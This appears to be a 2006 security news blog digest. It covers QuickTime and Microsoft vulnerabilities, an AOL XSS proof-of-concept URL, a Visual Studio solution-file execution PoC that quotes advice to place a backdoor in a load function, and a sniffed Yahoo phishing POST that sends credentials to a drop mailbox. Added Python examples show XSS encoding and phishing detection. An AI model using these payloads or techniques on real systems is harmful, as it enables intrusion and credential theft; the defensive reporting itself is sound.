For those using Mozilla Thunderbird, version 1.5 is now available for download from the official site.
eEye Digital Security has published four advisories related to Apple QuickTime vulnerabilities. These vulnerabilities are rated critical because they allow remote arbitrary code execution: an attacker can take control of the affected system with the same privileges as the logged-in user.
The vulnerabilities are listed below with a short description of each.
Apple QuickTime STSD Atom Heap Overflow
The vulnerability allows a remote attacker to reliably overwrite heap memory with user-controlled data and execute arbitrary code in the context of the user who executed the player or application hosting the QuickTime plug-in.
Apple iTunes (QuickTime.qts) Heap Overflow
The vulnerability allows an attacker to reliably overwrite heap memory with user-controlled data and execute arbitrary code in the context of the user who executed iTunes.
Apple QuickTime QTIF Stack Overflow
There is a stack overflow in the way QuickTime processes QTIF format files. An attacker can create a QTIF file and deliver it to the user via e-mail, a web page, or an ActiveX control, and can directly overwrite a function pointer that is used immediately, which bypasses the stack overflow protection in systems such as Windows XP SP2 and Windows Server 2003 SP1.
Apple QuickTime Malformed GIF Heap Overflow
…a critical heap overflow in the Apple QuickTime player that allows the execution of arbitrary code via a maliciously crafted GIF file.
This flaw has proven to allow reliable control of data in the heap chunk and can be exploited via a web site using ActiveX controls.
The following systems are affected by these vulnerabilities.
- QuickTime on Windows 2000
- QuickTime on Windows XP
- QuickTime on Mac OS X 10.3.9
- Apple iTunes on Windows 2000
- Apple iTunes on Windows XP
- Apple iTunes on OS X 10.3.9
Apple has released Apple QuickTime version 7.0.4 to solve these vulnerabilities. Mac OS X users should update their software by following the steps described in Apple’s web site. Windows 2000 and XP users should download Apple QuickTime 7.0.4.
Incidentally, the advisories were released on the same day as Microsoft's latest security updates.
Microsoft has now been granted a patent on the File Allocation Table (FAT) file system. This file storage system was originally developed for DOS and was carried forward into the Windows operating systems. FAT is also used in digital camera memory cards, flash disks and some Linux/UNIX-related products that exchange data with Windows.
After obtaining the patent, the Giant is now looking to collect royalties from all distributors of firmware and software that use the said technology. This poses a threat to the Free Software Community.
A security researcher from MorX found multiple AOL web sites that are prone to cross-site scripting (XSS). The attacker can execute almost any script. Here's a proof of concept:
- http://www.aim.com/<BLOCKED>?aolp=%22%3E%3Cscript%3Ealert('Hello%20World')%3C/script%3E
When you click on the link above, it displays a message box saying “Hello World”. You have to click the OK button before the message disappears, or you can terminate Internet Explorer through Task Manager.
To protect yourself from this type of attack, you can set IE's security level to High. Here's how:
- Go to Control Panel and double-click Internet Options.
- Click on the Security tab.
- Click on the Internet zone (the one with the globe icon).
- Move the slider up to High.
- Click the Apply button, then click OK.
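As an added example (not part of the original post), the Python below shows why the proof-of-concept payload above works and how HTML-entity encoding of the reflected parameter neutralises it. It assumes the aolp parameter is reflected into a quoted attribute value (which the leading %22%3E in the payload suggests); the /BLOCKED-PATH segment is a placeholder for the path the post blocks out.

```python
# Added example, not the original post's code: reflected XSS in the aolp
# parameter, and the same template hardened with output encoding.
from html import escape
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for the PoC URL; /BLOCKED-PATH is a placeholder.
POC_URL = ("http://www.aim.com/BLOCKED-PATH?aolp=%22"
           "%3E%3Cscript%3Ealert(%27Hello%20World%27)%3C/script%3E")


def aolp_from_url(url: str) -> str:
    """Return the URL-decoded aolp query parameter ('' if absent)."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("aolp", [""])[0]


def render_vulnerable(aolp: str) -> str:
    """Reflect the parameter into an attribute without encoding.
    The leading " closes the attribute and > closes the tag, so the rest
    of the value is parsed by the browser as live markup."""
    return f'<input type="hidden" name="aolp" value="{aolp}">'


def render_hardened(aolp: str) -> str:
    """Same template, but the value is entity-encoded (quote=True also
    encodes " and '), so the browser treats it as data, not markup."""
    return f'<input type="hidden" name="aolp" value="{escape(aolp, quote=True)}">'


def contains_injected_tag(html: str) -> bool:
    """Demo check: did a <script> tag survive into the rendered page?"""
    return "<script" in html.lower()


if __name__ == "__main__":
    payload = aolp_from_url(POC_URL)
    print("decoded parameter:", payload)
    print("vulnerable page  :", render_vulnerable(payload))
    print("hardened page    :", render_hardened(payload))
```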
A vulnerability found in Microsoft's Visual Studio can allow code execution. The catch is that even the “source code” of a project can contain hidden executable code. An exploit from a security group called Priestmasters proves this claim. More details can be found on the SecuriTeam web page.
I tested the proof of concept from Priestmasters on Microsoft Visual C# 2005 Express Edition Beta and it worked.
“If a user clicks on the solution file (vbexploit.sln) and form1.cs is shown, VS launches the code inside the UserControl1_Load function. Place your backdoor into this function (you can use the whole WIN-API and .NET framework to code your back door). The default behavior for the example file is to show a Message Box and launch calc.exe.”
Upon double-clicking the said solution file, a message box was displayed as shown below.
Clicking on the “OK” button launches “calc.exe”.
There are many options an attacker can choose from when exploiting the said vulnerability: the attacker may install a backdoor, spyware, or even a worm on the affected machine. As there is no known security patch available to address the vulnerability, users are advised not to trust unsolicited or unexpected Visual Studio source files, whether from unknown or known contacts. If source files were downloaded from the Internet, it is recommended to test or open them first on a test machine not connected to your network, to avoid any chance of a malware outbreak in your network.
Microsoft released two additional security bulletins for this month. These are tagged critical since remote code execution is possible when the vulnerability is successfully exploited. More details can be found on Microsoft's pages.
“A remote code execution vulnerability exists in Windows because of the way that it handles malformed embedded Web fonts. An attacker could exploit the vulnerability by constructing a malicious embedded Web font that could potentially allow remote code execution if a user visited a malicious Web site or viewed a specially crafted e-mail message. An attacker who successfully exploited this vulnerability could take complete control of an affected system.”
“A remote code execution vulnerability exists in Microsoft Outlook and Microsoft Exchange Server because of the way that it decodes the Transport Neutral Encapsulation Format (TNEF) MIME attachment.”
“An attacker could exploit the vulnerability by constructing a specially crafted TNEF message that could potentially allow remote code execution when a user opens or previews a malicious e-mail message or when the Microsoft Exchange Server Information Store processes the specially crafted message.”
“An attacker who successfully exploited this vulnerability could take complete control of an affected system.”
Users are encouraged to patch their machines immediately to avoid possible attacks by malicious users exploiting the said vulnerabilities. You can get the Microsoft patches by visiting Microsoft Update and Office Update. (Note for Firefox users: Internet Explorer must be used when going to Microsoft Update.) =)
Microsoft Windows GRE WMF Format Multiple Memory Overrun Vulnerabilities.
Two new vulnerabilities have been found in the Microsoft Windows Graphics Rendering Engine (GRE). They are related to the previous WMF vulnerability, but this time the result is a Denial of Service (DoS) rather than remote code execution, and the explorer.exe process may also restart. These vulnerabilities can be triggered by viewing specially crafted .wmf files.
These two new vulnerabilities are not addressed in the MS06-001 Security Update, so all products listed below are affected by the bugs.
- Microsoft Windows XP SP2
- Microsoft Windows XP SP1
- Microsoft Windows Server 2003 SP1
- Microsoft Windows Server 2003
- Microsoft Windows ME
- Microsoft Windows 98se
- Microsoft Windows 98
- Microsoft Windows 2000 SP4
However, according to Lennart Wistrand of Microsoft, these are just Windows performance issues: they are not really exploitable and do not allow an attacker to execute arbitrary code or crash the underlying OS. He also stated that the fixes are part of ongoing code maintenance and will be released in the next service pack of the affected products.
Since there are no patches yet that address these bugs, the workaround for the previous WMF vulnerability still applies. The steps to unregister the Windows Picture and Fax Viewer (Shimgvw.dll) are enumerated below.
- Go to Start, then click on “Run”.
- Type “cmd” or “command” to open the command prompt console.
- Type “regsvr32 -u %systemdir%\shimgvw.dll” in the command prompt.
References:
http://www.securityfocus.com/archive/1/421257
http://blogs.technet.com/msrc/archive/2006/01/09/417198.aspx
Note:
Two crafted .wmf samples that exploit the said vulnerabilities have been found on the Internet and have been given the detection names TROJ_WMFCRASH.B and TROJ_WMFCRASH.C.
%systemdir% is usually C:\windows\system (98 and ME), C:\windows\system32 (XP) or C:\winnt\system32 (2000).
Just after I finished reading a story about a hacker who hacked a lot of .gov.ph sites, my previous shiftmate popped me a message on Yahoo Messenger. He asked me if we had any new IM worm samples that use Yahoo Messenger. I told him none, not even a sample from the SOBER.AG anniversary links, then he immediately popped me the link http://www.<BLOCKED>.com/x0x_welcome_2006_x0x/. He told me that his friend had popped him that link. Below is the snapshot of their correspondence in YM:
And below is the screenshot of the Yahoo Phishing site:
Here we are again, reminding Internet users to be cautious about the links they visit. As we can see in the image, the site pretends to be a Yahoo Photos site, but the URL says it is a Geocities link. Always think twice before giving out any username and password on a website.
I sniffed the packet, to find out where the Yahoo account credentials will be sent to:
POST /form/mailto.cgi HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.<BLOCKED>.com/x0x_welcome_2006_x0x/?20068
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)
Host: www2.<BLOCKED>.net
Content-Length: 175
Connection: Keep-Alive
Cache-Control: no-cache

Mail_From=Yahoo&Mail_To=<BLOCKED>.@yahoo.com&Mail_Subject=Yahoo+id&Next_Page=http%3A%2F%2Fphotos.yahoo.com%2Fph%2F%2Fmy_photos&login=qwerty&passwd=asdf&.save=Sign+In

HTTP/1.1 302 Found
Date: Sun, 08 Jan 2006 00:43:46 GMT
Server: Apache/1.3.26 (Unix) mod_perl/1.26
Location: http://photos.yahoo.com/ph//my_photos
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
As we can see, the Yahoo credentials are being sent to <BLOCKED>.@yahoo.com.
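As an added example (not part of the original post), the Python below parses a capture modelled on the POST above and flags the traits that give the phishing page away: credential fields submitted to a host other than the one in the Referer, a generic form-to-mail CGI as the target, and a Mail_To drop address followed by a redirect to the real Yahoo site. The hostnames and the drop address are constructed placeholders standing in for the values the post blocks out.

```python
# Added example, not the original post's code: detection logic for the
# form-to-mail credential phishing pattern seen in the captured POST.
from urllib.parse import parse_qs, urlsplit

# Constructed capture modelled on the post; hosts and the drop address
# are placeholders (.invalid is a reserved TLD).
CAPTURE = (
    "POST /form/mailto.cgi HTTP/1.1\r\n"
    "Referer: http://www.phish-page.invalid/x0x_welcome_2006_x0x/?20068\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Host: www2.formmail-host.invalid\r\n"
    "\r\n"
    "Mail_From=Yahoo&Mail_To=drop-example%40yahoo.com&Mail_Subject=Yahoo+id&"
    "Next_Page=http%3A%2F%2Fphotos.yahoo.com%2Fph%2F%2Fmy_photos&login="
    "qwerty&passwd=asdf&.save=Sign+In"
)

CREDENTIAL_FIELDS = {"login", "passwd", "password", "pass", "username"}


def parse_request(raw: str):
    """Split a raw HTTP request into method, path, headers and form fields."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return method, path, headers, fields


def analyse(raw: str) -> dict:
    """Report the phishing indicators present in one captured request."""
    method, path, headers, fields = parse_request(raw)
    referer_host = urlsplit(headers.get("referer", "")).hostname or ""
    creds = sorted(CREDENTIAL_FIELDS & set(fields))
    return {
        "credential_fields": creds,
        # login form on one host posting to a different host
        "cross_host_post": bool(creds) and referer_host != headers.get("host", ""),
        # generic mail-relay CGI rather than a real login endpoint
        "form_to_mail": any(s in path.lower() for s in ("mailto", "formmail")),
        "exfil_address": fields.get("Mail_To"),
        "redirect_after": fields.get("Next_Page"),
    }


def is_credential_phish(raw: str) -> bool:
    r = analyse(raw)
    return bool(r["credential_fields"]) and (r["cross_host_post"] or r["form_to_mail"])
```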